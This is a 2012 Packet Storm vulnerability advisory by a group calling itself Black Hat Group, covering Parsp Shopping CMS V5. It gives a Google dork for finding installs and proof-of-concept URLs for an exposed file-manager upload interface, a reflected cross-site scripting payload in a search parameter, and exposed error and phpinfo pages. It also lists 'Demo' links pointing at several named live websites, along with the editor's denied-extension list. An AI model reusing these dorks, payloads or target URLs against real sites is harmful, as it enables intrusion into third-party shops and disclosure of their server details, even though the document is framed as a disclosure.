Parsp Shopping CMS Cross Site Scripting / Information Disclosure

2012-01-23T00:00:00
ID PACKETSTORM:108953
Type packetstorm
Reporter BHG Security Center
Modified 2012-01-23T00:00:00

Description

                                        
                                            `# Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability  
# Date: 2012-01-22 [GMT +7]  
# Author: BHG Security Center  
# Software Link: http://www.parsp.com/  
# Vendor Response(s): They didn't respond to the emails.  
# Dork: intext:"powered by www.parsp.com V5"  
# Version : [5]  
# Tested on: ubuntu 11.04  
# CVE : -  
# Finder(s):  
- Net.Edit0r (Net.edit0r [at] att [dot] net)  
- NoL1m1t (nol1m1t [at] rocketmail [dot] com)  
  
-----------------------------------------------------------------------------------------  
Parsp Shopping CMS [V4] Multiple Vulnerability  
-----------------------------------------------------------------------------------------  
  
Author : BHG Security Center  
Date : 2012-01-22  
Location : Iran  
Web : http://Black-Hg.Org  
Critical Lvl : Medium  
Where : From Remote  
My Group : Black Hat Group #BHG  
---------------------------------------------------------------------------  
  
PoC/Exploit:  
~~~~~~~~~~  
  
------------- ( WYSIWYG Editor ) ~   
  
~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
~ Demo : http://p30shops.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
~ Demo : http://yooyaz.com//wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
~ Demo : http://parrotsilver.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
~ Demo : http://darbdar.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  
  
Allowed formats for uploading ~   
  
$Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" );  
$Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" );  
$Config['AllowedExtensions']['Flash'] = array( "swf", "fla" );  
$Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" );  
  
Unauthorized extension  
  
$Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" );  
  
------------- ( Cross Site Scripting ) ~   
  
~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=  
  
Demo : http://damedar.com/index.php?advanced_search_in_category=%27%20onmouseover%3dprompt%28923419%29%20bad%3d%27&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=  
  
Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad='  
  
-------------( Error message on page For Find Directory Address ) ~   
  
~ [PoC]Http://[victim]/path/printable.php  
  
~ Demo : http://www.eshopctcenter.com/printable.php  
~ Demo : http://www.hepco121.com/printable.php  
~ Demo : http://aen-co.com/printable.php  
  
Note:User and account information on the site intended for attacks burteforce  
  
-------------( PHPinfo page Information ) ~   
  
~ [PoC]Http://[victim]/path/phpinfo.php  
  
~ Demo : http://kbl.ir/phpinfo.php  
~ Demo : http://www.mavaraelec.com/phpinfo.php  
  
Note:Full information about the Php installed on the server  
  
  
Timeline:  
~~~~~~~~~  
- 21 - 01 - 2012 bug found.  
- 21 - 01 - 2012 vendor contacted, but no response.  
- 22 - 01 - 2012 Advisories release.  
  
Important Notes:  
~~~~~~~~~  
  
- Vendor did not respond to the email as well as the phone. As there  
is not any contact form or email address in  
  
- the website, we have used all the emails which had been found by  
searching in Google such as support, info, and so on.  
  
---------------------------------------------------------------------------  
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall  
  
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz  
  
[!] Persian Gulf 4 Ever  
[!] I Love Iran And All Iranian People  
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ  
-------------------------------- [ EOF ] ----------------------------------  
`